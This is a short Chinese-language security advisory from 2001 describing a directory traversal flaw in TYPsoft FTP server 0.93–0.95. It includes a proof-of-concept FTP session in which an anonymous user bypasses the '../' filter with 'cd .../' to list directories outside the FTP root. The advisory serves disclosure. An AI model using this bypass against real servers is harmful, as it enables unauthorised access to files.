TYPsoft FTP server 存在目录遍历漏洞发布时间:2001-05-12 更新时间:2001-05-12 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 TYPsoft FTP server v0.95 - 0.93详细描述 TYPsoft FTP服务程序存在对输入没有很好的检查,导致攻击者可以匿名访问FTP服务器,并使用'../'来访问其他目录信息,包括敏感文件。 测试代码 >ftp 127.0.0.1 220 TYPsoft FTP server 0.95 ready... User (127.0.0.1:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp>pwd 257 " / " is current directory. ftp>cd ../ 501 CWD failed. Cannot accept relative path using dot notation. ftp> cd .../ 250 CWD command successful. "/.../" is current directory. ftp>dir drw-rw-rw- 1 ftp ftp 0 May 01 19:44 FTP Server drw-rw-rw- 1 ftp ftp 0 May 01 19:47 temp drw-rw-rw- 1 ftp ftp 0 Dec 24 2000 windows ..... 226 Transfer complete. ftp> 解决方案 尚无 相关信息 SosPiro sospiro@freemail.it |
